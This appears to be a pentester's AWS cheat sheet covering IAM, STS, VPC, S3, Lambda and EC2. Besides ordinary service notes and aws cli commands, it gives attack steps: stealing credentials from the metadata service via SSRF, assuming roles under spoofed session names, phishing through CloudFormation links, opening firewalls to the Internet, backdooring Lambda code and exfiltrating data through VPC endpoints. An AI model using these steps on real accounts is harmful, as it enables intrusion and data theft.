AWS Enumeration

Regions

A list of services by region is maintained by AWS. There are global and regional services.

Watch out for the global and regional Security Token Service (STS) endpoints, which provide temporary access to third-party identities. Tokens from regional STS endpoints are also valid in other regions, while tokens from the global endpoint are only valid in regions that are enabled by default.

In the aws cli, regions are selected with the cli argument --region.

Identity Access Management (IAM)



Permissions are granted directly through IAM identities (IAM Principals) inside an AWS account or indirectly through groups and roles the principal (user or service) has joined.

aws iam list-users

Users can be put into groups instead of direct role assignment, to specify permissions for a collection of users.

aws iam list-groups

Roles can be assumed by other trusted users through policies. Assumed roles are needed so that AWS Support has access to some resources, or so that an external identity provider (IdP) can be connected to AWS SSO as part of federated access. For example, the role for support is AWSServiceRoleForSupport.

aws iam list-roles

Gaining access to important roles like maintenance opens the door to higher permissions.

Services use resources bound to the IAM inside the account. The scheme for services is <servicename>.amazonaws.com. Services, as trusted entities, assume roles to gain permissions.

A * represents every principal. Set the * to make an instance of a service public through the Internet.

Identify an unknown account ID by using an access key

aws sts get-access-key-info --access-key-id <AKIAkey>

The IAM is not necessarily used by S3. AK/SK is sufficient for authentication and authorization.

- AWS uses unique ID prefixes

- An AWS unique account ID has a length of 12 digits.

- Long-term access key ID, starts with AKIA and has a length of 20 characters

- Secret access key (SK)

- Short-term access key ID, starts with ASIA and comes with a session token

- AWS Organizations control the accounts that joined

- Third-party identity providers are supported

- IAM Identity Center of an organization allows provisioning of accounts from third parties through AWS SSO
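The prefixes above allow a quick triage of identifiers found during enumeration. The following is a minimal sketch, not an official tool. The function name classify_aws_id is hypothetical, and the AIDA (IAM user) and AROA (IAM role) prefixes are not mentioned in these notes but are assumed from the AWS documentation on IAM identifiers.

```shell
# Classify an AWS identifier by its four-letter prefix.
# classify_aws_id is a hypothetical helper name.
classify_aws_id() {
  case "$1" in
    AKIA*) echo "long-term access key ID" ;;
    ASIA*) echo "temporary access key ID" ;;   # only usable together with a session token
    AGPA*) echo "IAM group ID" ;;
    AIDA*) echo "IAM user ID" ;;               # assumption: from the AWS IAM identifier docs
    AROA*) echo "IAM role ID" ;;               # assumption: from the AWS IAM identifier docs
    *)     echo "unknown" ;;
  esac
}
```

Call it with any identifier that was found, for example classify_aws_id ASIAMFKOAUSJ7EXAMPLE.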

Root Accounts

Every AWS account has a single root account bound to an email address, which is also the username. This account has all privileges over the AWS account. A root account has MFA disabled by default. It has all permissions and can only be restricted by the Service Control Policies of an organization.

The account is susceptible to an attack if the mail address is accessible but MFA is not activated.

The email address of the root account, which is called MasterAccountEmail, can be found by a member of an AWS Organization via

aws organizations describe-organization

If the MFA is not set, it is an opportunity for a password reset attack when the account the vulnerable root belongs to is part of an AWS Organization.

If the email address is also linked to an Amazon retail account and it is shared between people, everyone has full root access.



Principal, Resource & Service Policies



Policies are an authorization measure. After authentication of a user (or principal), the policies of the account are checked to decide whether the request is allowed. A policy may also be attached to a resource or (in an organization) a service. Policy evaluation is described in the AWS docs. There are resource-based and identity-based policies.

aws iam get-policy --policy-arn <ARN>

A policy document looks like the following example

{

"Version": "2012-10-17",

"Statement": [

{

"Effect": "Allow",

"Action": "s3:ListAllMyBuckets",

"Resource": "*"

}

]

}

Policy enforcement is done via the Effect key, which is set to either Allow or Deny in the JSON object. Deny is the default, and an explicit Deny overrides any Allow.
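The Effect logic can be sketched as a small function. This is a simplified illustration that assumes the statements matching a request have already been selected. It ignores SCPs, permission boundaries and session policies, and the name evaluate_effects is hypothetical.

```shell
# Decide a request from the Effect values of all matching statements.
# No matching statement: implicit deny. Any Deny: explicit deny wins.
evaluate_effects() {
  decision="ImplicitDeny"
  for effect in "$@"; do
    case "$effect" in
      Deny)  echo "ExplicitDeny"; return 0 ;;  # an explicit Deny always overrides
      Allow) decision="Allow" ;;
    esac
  done
  echo "$decision"
}
```

For example, evaluate_effects Allow Deny yields ExplicitDeny, while a call without arguments yields ImplicitDeny.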

The Action keyword contains a service and an API keyword on that service in the scheme <servicename>:<APIKeyword>, e.g. "Action":["ec2:Get*","ec2:Describe*", "s3:*"]. See the Service Authorization Docs.
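Wildcards in Action values behave much like shell globs, which makes them easy to test locally. The following sketch assumes case-insensitive matching with * and ? only. The function name action_matches is hypothetical, and patterns containing [ would be treated as shell bracket expressions, which IAM does not do.

```shell
# Return success if the requested action ($2) is covered by the policy pattern ($1).
action_matches() {
  pattern=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  action=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
  case "$action" in
    $pattern) return 0 ;;   # unquoted on purpose: the pattern is used as a glob
    *)        return 1 ;;
  esac
}
```

A check like action_matches 'ec2:Describe*' ec2:DescribeInstances succeeds, while action_matches 'ec2:Get*' ec2:DescribeInstances fails.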

The Resource key contains the ARN of the resource the policy is set for.

The Principal key is only set for resource policies and contains the principal who is able to act on the resource. For example, a * value allows public access.

Operators can be used to set conditions using key value pairs inside policies

"Condition": {

"IpAddressIfExists": {"aws:SourceIp": ["xxx"] },

"StringEqualsIfExists": {"aws:SourceVpc": ["yyy"]}

}

Principals, resources and actions can also be excluded specifically through NotPrincipal, NotResource and NotAction.

The following graph is taken from the documentation, it shows the evaluation logic inside an account

A principal can have multiple policies attached.

Policies like assume-role and switch-role can lead to the gain of roles with higher permissions.

A * inside a "Principal" value represents every principal. Set the * to make an instance of a service public through the Internet, like in the following rule.

"Principal": {

"AWS": "*"

}

Administrator access policies can be queried to see who has elevated permissions.

aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --version-id v1

The AdministratorAccess policy looks like this

{

"Version": "2012-10-17",

"Statement": [

{

"Effect": "Allow",

"Action": "*",

"Resource": "*"

}

]

}

AWS Organizations

An organization is a tree structure, made out of a single root account and Organizational Units (OUs). OUs can have child OUs. An OU may contain multiple AWS accounts. An AWS account can contain multiple user accounts.

An organization has IAM and SSO that also works with external identity providers (IdP). This is done through the AWS IAM Identity Center, which is used to configure roles and permissions.

Further, there is a management account inside any organization. Member accounts created through the organization contain the role "OrganizationAccountAccessRole", which the management account can assume. The management account uses the mechanisms mentioned in the User Policies, which are assume-role on the cli tool and switch-role on the management web console, to gain administrative permissions over the OUs inside the organization.

By default, the Service Control Policy (SCP) FullAWSAccess (p-FullAWSAccess) is attached to every account inside the organization. This SCP allows the use of all AWS services. An account can have 5 SCPs at most. Restrictive SCPs do not apply to the management account itself.

User Provisioning and Login

When using the aws cli, the configuration and credentials are stored in ~/.aws.

The documentation shows how to set up the user login.

Add the credentials to the default profile via

aws configure

Add credentials to a profile which is not default via

aws configure --profile PROFILENAME

Set a session token for the profile

aws configure --profile PROFILENAME set aws_session_token <sessionToken>

Sanity test a profile by checking that it works via

aws iam list-users

aws s3 ls --profile PROFILENAME

Find account ID to an access key

aws sts get-access-key-info --access-key-id AKIAEXAMPLE

List the (current) user details

aws sts get-caller-identity

aws sts --profile <username> get-caller-identity

Find username to an access key

aws sts get-caller-identity --profile PROFILENAME

List EC2 instances of an account

aws ec2 describe-instances --output text --profile PROFILENAME

In another region

aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME

Create a user via cloudshell.

aws iam create-user --user-name <username>

Add a user to a group via cloudshell.

aws iam add-user-to-group --user-name <username> --group-name <groupname>

List groups for a user using aws cli. GroupIds begin with AGPA.

aws iam list-groups-for-user --user-name padawan

Credentials

User passwords are called login profiles. The password is used for the web UI and console, while the aws cli tool and queried APIs use access keys.

Create a user password via aws cli

aws iam create-login-profile --user-name <username> --password <password>

Change the password using the aws cli

aws iam update-login-profile --user-name <username> --password <password>

Take a look at the password policy via aws cli

aws iam get-account-password-policy

API Access Keys

Long-term, non-expiring access key IDs start with AKIA and have a length of 20 characters.

List the access keys via aws cli.

aws iam list-access-keys

Create an access key via the aws cli.

aws iam create-access-key --user-name <username>

Disable, enable or delete an access key via the aws cli

aws iam update-access-key --access-key-id <AKIAkey> --status Inactive

aws iam update-access-key --access-key-id <AKIAkey> --status Active

aws iam delete-access-key --access-key-id <AKIAkey>

Shortterm Session Keys (STS)

Session keys are short term, they expire. A session key starts with ASIA. These are generated by the Security Token Service.

Use aws cli to create a session token through STS.

aws sts get-session-token

If you want to set a profile for a principal that only has a session token, use these aws cli commands.

aws configure --profile PROFILENAME

aws configure --profile PROFILENAME set aws_session_token <sessionToken>

A token can be applied to a user as a second factor. If the user is provided by another federated entity through an IdP, the MFA needs to be provided through that solution.

List users with MFA enabled via aws cli.

aws iam list-virtual-mfa-devices

You can get the account ID an access key belongs to through the STS service

aws sts get-access-key-info --access-key-id <AKIA-key>

The session token can be found via the cloudshell through the use of curl.

curl -H "X-aws-ec2-metadata-token: $AWS_CONTAINER_AUTHORIZATION_TOKEN" $AWS_CONTAINER_CREDENTIALS_FULL_URI

Assume Roles through STS

As an attack vector, a user can assume a role of higher privileges through the STS. This might happen through a policy bound to a group the user is a member of.

You need an ARN of the role you want to assume

arn:aws:iam::<ACCOUNT_ID>:role/<rolename>

A role session name is needed as well. It can be chosen freely, for example the name of someone who already has the role we want to assume, taken from the CloudTrail logs.

Use aws cli to assume the role.

aws --profile <lowprivuser> sts assume-role --role-arn arn:aws:iam::<ACCOUNT_ID>:role/<rolename> --role-session-name <highprivuserthathastherole>

The result of this is the AccessKeyId, SecretAccessKey and SessionToken of the role session, which complete the three variables needed for acquiring the higher privileges.

export AWS_SECRET_ACCESS_KEY=<HighPrivUserSK>

export AWS_ACCESS_KEY_ID=<HighPrivUserAK>

export AWS_SESSION_TOKEN=<SessionToken>

Check the current identity after setting the variables via aws cli.

aws sts get-caller-identity

Secrets

Use the secrets manager via

aws secretsmanager help

aws secretsmanager list-secrets

aws secretsmanager get-secret-value --secret-id <Name> --region <region>

Amazon Resource Name (ARN)

The ARN is a unique ID which identifies resources.

A unique ID is created through the following scheme

arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
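The scheme can be split into its fields with plain shell. This is a minimal sketch under the assumption that the first five colons separate the fixed fields and everything after them is the resource part. The function name parse_arn is hypothetical.

```shell
# Split an ARN into its fields. The resource part may itself contain ':' or '/',
# so it is read last and keeps the remainder of the string.
parse_arn() {
  IFS=: read -r prefix partition service region account resource <<EOF
$1
EOF
  [ "$prefix" = "arn" ] || { echo "not an ARN: $1" >&2; return 1; }
  printf 'partition=%s service=%s region=%s account=%s resource=%s\n' \
    "$partition" "$service" "$region" "$account" "$resource"
}
```

Global services such as IAM leave the region field empty, which shows up as region= in the output.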

IAM - Gain Access through Vulnerabilities

Gathering Credentials

Git repositories, especially on GitLab and GitHub but also other repositories, can be a source of credentials. A tool to find sensitive data inside git repositories is Trufflesecurity's Trufflehog.

Other repositories, like package repositories for programming languages, are also prone to contain credentials unintentionally.

Credentials can be found in environment variables like AWS_SESSION_TOKEN, AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY, shared credential files inside home directories like ~/.aws/credentials, assumed roles cached in ~/.aws/cli/cache, the aws cli configuration file ~/.aws/config, Boto2 and Boto3 configuration, or via the IMDS on EC2 instances.

You can get the account ID through the STS service using the access key

aws sts get-access-key-info --access-key-id <AKIA-key>

Identify AccountIds, IAM roles and users as valid principals in an account by creating a resource-based policy. Create a resource which needs a resource-based policy and update the policy for the principal you want to enumerate. There are two outcomes

- The principal exists, the policy will be updated/created

- The principal does not exist and there is an error message returned

Use Righteousgambit's Quiet Riot to enumerate AWS, Azure and GCP principals. A user list is needed for enumeration of an AccountId. ACLs can contain email addresses of root users. These addresses can be found by Quiet Riot as well. AWS service footprinting and role enumeration can be done by Quiet Riot, too.

These different scans are parameters for the --scan argument. AWS scans have the following numbers.

1. AWS Account IDs

2. AWS Services Footprinting

3. AWS Root User E-mail Address

4. AWS IAM Principals

4.1. IAM Roles

4.2. IAM Users

Gain Access through CloudFormation

It is possible to phish credentials through url manipulation and sending it to someone with higher privileges.

This may be achieved through link manipulation. A link for a CloudFormation Stackset creation looks like this.

https://console.aws.amazon.com/cloudformation/home?region=<region>#/stacks/new?stackName=<maliciousStackName>&templateURL=https://s3.amazonaws.com/<bucketname>/<templatename>.template

CloudFormation Stacks can be listed through aws cli.

aws cloudformation describe-stacks | jq .

Gaining Access through Metadata Service

The Metadata Service (IMDS) returns information about the EC2 instance and the IAM role it uses. Take a look at the chapter Metadata Service to get into the details.

To gain access from the web, you need something like an LFI or an SSRF to request the IMDS through the EC2 instance indirectly. The goal is to gain access to the environment variables and, as a result, to AWS_SESSION_TOKEN, AWS_SECRET_ACCESS_KEY and AWS_ACCESS_KEY_ID.

Query the role name first. Use it to query the credentials of the instance profile role afterwards.

http://169.254.169.254/latest/meta-data/iam/security-credentials/

http://169.254.169.254/latest/meta-data/iam/security-credentials/<FoundRoleName>

Export the variables and check if you got the instance profile permissions correctly via aws cli.

aws sts get-caller-identity

Credentials Gain through CI/CD

Credentials can be found directly inside files of a bucket or through the use of the bucket by other services, which store credentials inside the bucket as a result of some executed scripts.

Services

An action on an API of a service is structured like <servicename>:<APICall>.

Session tokens can also be created for services for temporary access of resources. This can be done through metadata service on an EC2 instance. The session token and AK/SK are also visible in the environment variables of AWS Lambda.

The session token can be found via the cloudshell through the use of curl.

curl -H "X-aws-ec2-metadata-token: $AWS_CONTAINER_AUTHORIZATION_TOKEN" $AWS_CONTAINER_CREDENTIALS_FULL_URI

Virtual Private Cloud (VPC)

A VPC is a logical network segmentation method using its own IP address range. It is a software-defined network.

A VPC ID starts with vpc- and used to have a length of 8 characters. Since 2018 it has a length of 17 characters.

A VPC is part of the EC2 namespace ec2:CreateVPC

VPC is a regional service. VPCs can have multiple subnets bound to a single AZ, they use host infrastructure components like DHCP, NTP and DNS provided by AWS.

NTP can be found under 169.254.169.123. The Route 53 DNS resolver can be found under 169.254.169.253. Microsoft's KMS service can be found at 169.254.169.250 and 169.254.169.251.

VPCs have ARP only for compatibility but do not need it. Therefore, ARP poisoning is not an option.

Resources inside a VPC have an Elastic Network Interface (ENI), and a public IP is bound to such a network interface. ENIs inside a VPC are secured by ACLs and Security Groups. Other services are secured by IAM.

List available network interfaces with a specific IP address via aws cli.

aws ec2 describe-network-interfaces | \

jq '.NetworkInterfaces[] | select(.PrivateIpAddress == "10.100.47.11")'

VPC & Subnet Routing

A VPC contains EC2 VMs and has an Internet Gateway (router) if needed. There are private gateways, called VPN Gateway (VGW), and Internet Gateways. A gateway can be either just ingress, egress, or both. To connect to a VPC, it does not need to be exposed to the Internet. It is accessible through various connection services like Direct Connect or PrivateLink.

A subnet is connected to a NAT gateway, which then connects to a VGW or Internet Gateway. If no explicit routing table is selected for a subnet, it will inherit the main routing table. The routing table sets the availability of the subnet in regards to the Internet Gateway. Routing of the Internet Gateway is a separate rule.

Routes can be set on groups of CIDR blocks, which are named Managed Prefix Lists. A prefix list controls access to public IP addresses as well.

Describe the prefix lists via aws cli.

aws ec2 describe-prefix-lists

Network Access Control Lists (NACLs)

NACLs are logical, stateless firewalls for entire subnets. Inbound and outbound traffic has to be authorized by Allow and Deny rules. Rules are processed in order of their rule number and the first match wins, so a Deny does not override an Allow with a lower number. The implicit final rule of every NACL is Deny All.
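The ordered processing of NACL rules can be sketched as follows. This is a strong simplification that matches on the port only, whereas real NACL rules also match on CIDR block and protocol. The rule format "number action port" and the name nacl_decide are hypothetical.

```shell
# Evaluate NACL-like rules for a port. Rules are given as "number action port",
# where port may be "all". The lowest matching rule number wins.
nacl_decide() {
  port=$1; shift
  result=$(printf '%s\n' "$@" | sort -n | while read -r num action rule_port; do
    if [ "$rule_port" = "$port" ] || [ "$rule_port" = "all" ]; then
      echo "$action"
      break                 # first match wins, later rules are ignored
    fi
  done)
  echo "${result:-deny}"    # nothing matched: the final catch-all rule denies
}
```

With the rules "100 allow 22" and "200 deny 22", port 22 is allowed because rule 100 is evaluated first.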

Security Groups

Security Groups are stateful and get attached to resources like EC2 or database services. Rules select IP addresses (or ranges) or other Security Groups, a protocol and ports (or ranges). Security Groups work with Allow only and separate Ingress & Egress.

VPC Endpoints

VPC Endpoints connect a VPC with an outside service. The route is set through a table of CIDRs or Managed Prefix Lists.

An attacker may add VPC endpoints to exfiltrate data to S3 buckets under his control.

List available vpcs, and endpoints via aws cli.

aws ec2 describe-vpcs

aws ec2 describe-vpc-endpoints

After listing the endpoints take a look at the routing tables via aws cli.

aws ec2 describe-route-tables --route-table-ids <routeTableId>

Private Link

Private Link is a network interface (ENI) which can be used from the outside without a direct connection to the Internet.

VPC & DNS

Besides Route 53, which is available through 169.254.169.253, there is a DNS server in every VPC. It is located at the gateway IP address + 1, which is the base address of the VPC network range + 2.
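The address of the VPC DNS server can be derived from the VPC CIDR, since it is the network base address plus two, one above the gateway. The sketch below assumes that the given CIDR starts at the network base address, as VPC CIDRs do. The function name vpc_dns_ip is hypothetical.

```shell
# Print the VPC DNS server address for a VPC CIDR such as 10.100.0.0/16.
# Assumption: the address part of the CIDR is the network base address.
vpc_dns_ip() {
  base=${1%/*}                        # strip the prefix length
  IFS=. read -r o1 o2 o3 o4 <<EOF
$base
EOF
  echo "$o1.$o2.$o3.$((o4 + 2))"      # base + 1 is the router, base + 2 the DNS server
}
```

For a VPC with the range 10.100.0.0/16 this prints 10.100.0.2.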

VPC & Monitoring

VPC Flow Logs log the headers of the packets inside the network traffic. These logs can be sent to CloudWatch or a simple S3 bucket.

VPC Traffic Mirroring is used for Deep Packet Inspection (DPI) through mirroring the traffic along an L3 route.

DNS logs are sent to CloudWatch Logs in the group named "VPCResolverLogs".

Amazon GuardDuty is used for threat detection and uses Flow & DNS logs.

VPC Connections

Connect the VPC to on-prem via Direct Connect through a dedicated link. Needs a routing table.

Site to Site VPN leverages an IPSec connection through a configured customer gateway instead of a dedicated link, which is cheaper. The customer gateway is linked to the VGW. Needs a routing table.

VPC Peering connects VPCs of different accounts and regions. Useful for disaster recovery. Needs an entry in each routing table. A network connection is always a stub, no connection to third networks through a hop over another one.

Transit Gateway allows multiple hops between VPCs through other VPCs.

Client VPN is a simple VPN connection to the VPCs of an AWS account in use leveraging MFA authentication.

Bind Public IP Address to Access a VPC

A public IP address is needed to have ingress on an EC2 VM.

Allocate a public IP address via aws cli

aws ec2 allocate-address

Find details about the ENI of the EC2 instance you want to bind the IP address to via aws cli.

aws ec2 describe-instances | jq '.Reservations[].Instances[].NetworkInterfaces[]'

Use the AllocationId and NetworkInterfaceId found in the steps before. Attach the IP address to the ENI via aws cli.

aws ec2 associate-address --allocation-id <AllocationId> --network-interface-id <NetworkInterfaceId>

Make the IP address accessible from the Internet through an Internet Gateway

Get the InternetGatewayId first via aws cli

internet_gateway_id=$(aws ec2 describe-internet-gateways | jq -r '.InternetGateways[].InternetGatewayId')

Query the RouteTableId of a specific Tag (of an EC2) via aws cli.

route_table_id=$(aws ec2 describe-route-tables | jq -r '.RouteTables[] | select(.Tags[] | select(.Key == "Name" and .Value == "MyGivenTag")) | .RouteTableId')

Add the route through the InternetGateway via aws cli.

aws ec2 create-route --route-table-id $route_table_id --destination-cidr-block 0.0.0.0/0 --gateway-id $internet_gateway_id

Modify the Security Group for Ingress from the Internet via aws cli

Pick a desired Security Group via aws cli.

aws ec2 describe-security-groups | jq .

Create a rule for the security group to allow every connection via aws cli.

aws ec2 authorize-security-group-ingress --protocol all --port 0-65535 --cidr 0.0.0.0/0 --group-id <GroupId>

Modify ACL for Access

List available ACLs and find the desired NetworkAclId through aws cli.

aws ec2 describe-network-acls | jq .

Use this NetworkAclId to create an ingress rule on position 1 through any

protocol on any address via aws cli.

aws ec2 create-network-acl-entry --cidr-block 0.0.0.0/0 --ingress --protocol -1 --rule-action allow --rule-number 1 --network-acl-id <NetworkAclId>

Create an egress rule as well via aws cli.

aws ec2 create-network-acl-entry --cidr-block 0.0.0.0/0 --egress --protocol -1 --rule-action allow --rule-number 1 --network-acl-id <NetworkAclId>

Now the VPC and the EC2 instance are accessible through the Internet.

Metadata Service

Metadata Service on EC2

The instance (OpenStack) metadata service can be found under 169.254.169.254. It can be used to gain information about the EC2 instance via a GET request to http://169.254.169.254/latest/meta-data.

The instance metadata service has been used for information disclosure of security credentials before. Alexander Hose describes how to use the credentials through aws-cli.

[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

ec2S3FullAccess

[ec2-user ~] curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2S3FullAccess

{

"Code": "Success",

"LastUpdated": "2022-10-01T15:19:43Z",

"Type": "AWS-HMAC",

"AccessKeyId": "ASIAMFKOAUSJ7EXAMPLE",

"SecretAccessKey": "UeEevJGByhEXAMPLEKEY",

"Token": "TQijaZw==",

"Expiration": "2022-10-01T21:44:45Z"

}

Use the credentials to configure aws-cli.

$ aws configure

AWS Access Key ID [None]: ASIAMFKOAUSJ7EXAMPLE

AWS Secret Access Key [None]: UeEevJGByhEXAMPLEKEYEXAMPLEKEY

Default region name [None]: us-east-2

Default output format [None]: json

Add the credentials to the AWS credentials file

[default]

aws_access_key_id = ASIAMFKOAUSJ7EXAMPLE

aws_secret_access_key = UeEevJGByhEXAMPLEKEYEXAMPLEKEY

aws_session_token = TQijaZw==
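Instead of copying the values by hand, the JSON document returned by the metadata service can be turned into export statements. This is a rough sketch that assumes the flat "key": "value" layout shown above and uses sed instead of a real JSON parser. The function names json_field and creds_to_exports are hypothetical.

```shell
# Extract one string field from a flat JSON document read from stdin.
# Assumption: simple "key": "value" pairs as returned by the IMDS.
json_field() {
  sed -n 's/.*"'"$1"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p'
}

# Turn the IMDS credential document (stdin) into export statements.
creds_to_exports() {
  doc=$(cat)
  printf 'export AWS_ACCESS_KEY_ID=%s\n' "$(printf '%s\n' "$doc" | json_field AccessKeyId)"
  printf 'export AWS_SECRET_ACCESS_KEY=%s\n' "$(printf '%s\n' "$doc" | json_field SecretAccessKey)"
  printf 'export AWS_SESSION_TOKEN=%s\n' "$(printf '%s\n' "$doc" | json_field Token)"
}
```

Pipe the output of the second curl request into creds_to_exports and evaluate the result in the attacking shell, then verify with aws sts get-caller-identity.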

Metadata Service on ECS

This task metadata service can be found at 169.254.170.2 and is used for the Elastic Container Service (ECS)

Elastic Container Service is using the version 2 of IMDS. The URL for the metadata service is the following.

http://169.254.170.2/v2/metadata

From inside a container curl can be used to get the credentials

curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

Simple Storage Service (S3)

S3 is an object storage without volume limits.

A nested directory structure in a bucket is possible, but it is only a pseudo file system for organizing files.

The names of buckets are unique and the namespace of buckets is global, but they are stored regionally.

Versioning of files is possible. Files will not be overwritten by updated versions. Files are encrypted by default.

Methods of access control are as follows

Every bucket that was created before November 2018 has default public access permissions. Since November 2018 public access is blocked by default.

A typical attack includes modifying files on a bucket another service is using.

S3 Policies

Useful permissions for an attack, set through a policy, are s3:GetObject and s3:PutObject.

There are identity-based and resource-based policies for S3 buckets. If a resource-based policy grants global access or read, the objects are available to everyone, even unauthenticated.

{

[...]

"Effect": "Allow",

"Principal": "*",

"Action": [

"s3:GetObject",

"s3:PutObject"

],

[...]

}

Check which policies are set

aws s3api get-bucket-policy-status --bucket <bucketname>

aws s3api get-bucket-ownership-controls --bucket <bucketname>

ACL

Existed since before AWS IAM. The ACL is generated for every bucket created. Resource owner gets full permissions. ACL can be extended through principals' canonical userID and services which are allowed or forbidden to access the bucket.

Attack vector: The group Any Authenticated AWS User can be set as a grantee, which covers every authenticated AWS user.

If the ACL is set to

- Anyone, just curl

- AuthenticatedUsers, s3 cli with aws key

Scheme

The URL scheme for S3 is the following.

http://<bucketname>.s3.amazonaws.com/file.name

or

http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
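When URLs are collected during reconnaissance, the bucket name has to be extracted from either scheme before it can be passed to the aws cli. A minimal sketch, assuming only the two global endpoint forms shown above (regional endpoints are not handled). The function name s3_bucket_from_url is hypothetical.

```shell
# Print the bucket name of an S3 URL in virtual-hosted or path style.
s3_bucket_from_url() {
  url=${1#*://}              # drop the scheme
  host=${url%%/*}            # everything before the first slash
  path=${url#*/}             # everything after the first slash
  case "$host" in
    s3.amazonaws.com)   echo "${path%%/*}" ;;               # path style
    *.s3.amazonaws.com) echo "${host%.s3.amazonaws.com}" ;; # virtual-hosted style
    *) return 1 ;;
  esac
}
```

The result can be used directly, for example in aws s3 ls s3://<bucketname>/ --no-sign-request.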

Check Read Permissions of a bucket

Use the aws cli to store data from a bucket locally.

aws s3 sync --no-sign-request s3://<bucket-name> .

Check Permissions of a bucket

Check the Policy of the bucket via aws cli.

aws s3api get-bucket-policy --bucket <bucketname> --query Policy --output text | jq .

Or, the quick and dirty way, use a PUT request to see if the bucket is writable by uploading a file via

curl -vvv -X PUT $BUCKET_URL --data "Test of write permissions"

List content of public bucket via

aws s3 ls s3://<bucketname>/ --no-sign-request

Download via curl, wget or s3 cli via

aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request

Lambda

Lambda is a serverless, event-driven compute service offered by AWS. This means you don't need to run a backend for a function you want to provide. Queries to the function containing events are sent via an API. Invocation of the Lambda functions can be synchronous or asynchronous, but not in parallel. The event and its context are passed to a Lambda handler. A Lambda function has its own container deployed. An instance is initiated as a cold start at first run.

Lambda has layers for code sharing. These layers can be found under /opt.

Lambda functions can be queried through HTTP. The scheme of such a uniquely identified URL is like the following. The request has to be signed if authentication is required.

https://<urlId>.lambda-url.<region>.on.aws

Lambda Vulnerabilities

Vulnerabilities include

- Missing input validation and sanitization on the event sent as user input to the Lambda function

- Sensitive data written to stdout and stderr, which is then sent to CloudWatch

- Lambda in a VPC

- Permissive roles for function execution

Examples of exciting permissions are ReadAccess in general or the following roles.

AmazonS3FullAccess

AWSLambda_FullAccess

- Privilege escalation through access to the environment variables $AWS_ACCESS_KEY_ID, $AWS_SECRET_ACCESS_KEY and $AWS_SESSION_TOKEN inside the Lambda container from function execution or from the web console

Use the found environment variables to find the AccountId via aws cli.

export AWS_SESSION_TOKEN=<Found-AWS_SESSION_TOKEN>

export AWS_SECRET_ACCESS_KEY=<Found-AWS_SECRET_ACCESS_KEY>

export AWS_ACCESS_KEY_ID=<Found-AWS_ACCESS_KEY_ID>

aws sts get-caller-identity

- Access to the unencrypted secrets inside environment variables through function execution inside the container

- Use of lambda:* instead of lambda:invokeFunction as part of a resource policy

- Use of Principal: * inside an IAM policy

List functions and check invocation policies of lambda functions via aws cli.

aws lambda get-function --function-name arn:aws:lambda:<region>:<AccountId>:function:<functionName>

aws lambda get-policy --query Policy --output text --function-name arn:aws:lambda:<region>:<AccountId>:function:<functionName> | jq .

Check the role policies of the found Lambda functions via aws cli.

func="<function1> <function2> <function3>"

for fn in $func; do

role=$(aws lambda get-function --function-name $fn --query Configuration.Role --output text | awk -F\/ '{print $NF}')

echo "$fn has $role with following policies"

aws iam list-attached-role-policies --role-name $role

for policy in $(aws iam list-role-policies --role-name $role --query PolicyNames --output text); do

echo "$role for $fn has policy $policy"

aws iam get-role-policy --role-name $role --policy-name $policy

done

done

- Modifying Lambda layers through malicious code

- Use the concurrency of Lambda functions as a DoS measurement

Invoke Modified Functions

Get the function ZIP file through the URL or the following aws cli line to inspect the code for sensitive data

func="<function1> <function2> <function3>"

for fn in $func; do

url=$(aws lambda get-function --function-name $fn --query Code.Location --output text)

curl -s -o $fn.zip $url

mkdir -p $fn

unzip $fn.zip -d $fn

done

Invoke a function with a predefined event, after getting intel from the zip, stored in event.json via aws cli.

aws lambda invoke --function-name <functionName> --payload fileb://event.json out.json

Update a function through modified source code in a ZIP file via aws cli.

aws lambda update-function-code --region <region> --function-name <functionName> --zip-file fileb://modified.zip

Create a payload next_event.json and invoke the function via aws cli.

aws lambda invoke --function-name <functionName> --payload fileb://next_event.json out.json

CloudFront

CloudFront is a Content Delivery Network (CDN), which stores static data on Edge Locations, closer to the customer for performance improvements.

Geo-fences can be placed to restrict access to the content. Authorization-based requests can also be used, and encryption of data is possible.

A Web Application Firewall (WAF) as well as Distributed Denial of Service (DDoS) prevention can be configured for CloudFront instances.

CloudFront Hosts

An "origin" of a CloudFront instance can be resources like EC2, ELBs or S3 buckets. Origin Access Identities (OAIs), which are used in resource-based policies for the resources or "origins" of a CloudFront instance, need to be set by the owner. For an attack to take place, information about the DNS records of a domain is needed to find probable CloudFront resources.

Use dig, drill or nslookup to list IP addresses of a (sub-)domain where assets are potentially hosted. Do a reverse lookup to get the AWS domains of the resources behind the IP addresses.

drill assets.example.com

drill <$IP_ADDRESS> -x

How to find a potentially interesting CloudFront assets domain

- Enumerate subdomains of a website

- Do some dorking with a search engine to list the content of a bucket behind an S3 subdomain

- Spider a website via wget or Linkfinder

- Search for certificate details

EC2

Deploy service instances of virtual machines inside a VPC. EC2 instances can be deployed into 26 regions. Supports multiple OSs. On-demand billing.

EC2 can use elastic IP addresses to provide Ingress. A Gateway Load Balancer can be used to do traffic inspection.

Enumerate EC2 Instances

List EC2 instances in the account via aws cli.

aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json

List all InstanceIds in the account via aws cli.

list=$(aws ec2 describe-instances --region <region_name> --query 'Reservations[].Instances[].InstanceId' --output json --profile PROFILENAME | jq -r '.[]')

Get user data like cloud-init scripts from the instances via aws cli.

for i in $list;do

aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData.Value --region <region_name> | base64 -d > $i-userdata.txt

done

Connect to an EC2 Instance

Connect to the instance using SSH, RDP, SSM, serial console or web console. A key pair is needed to connect, for example EC2 Connect uses temporary keys. The serial console has to be activated by the administrator and the user which will be used to log in needs a password set.

The URL scheme for EC2 Connect through the webconsole is the following.

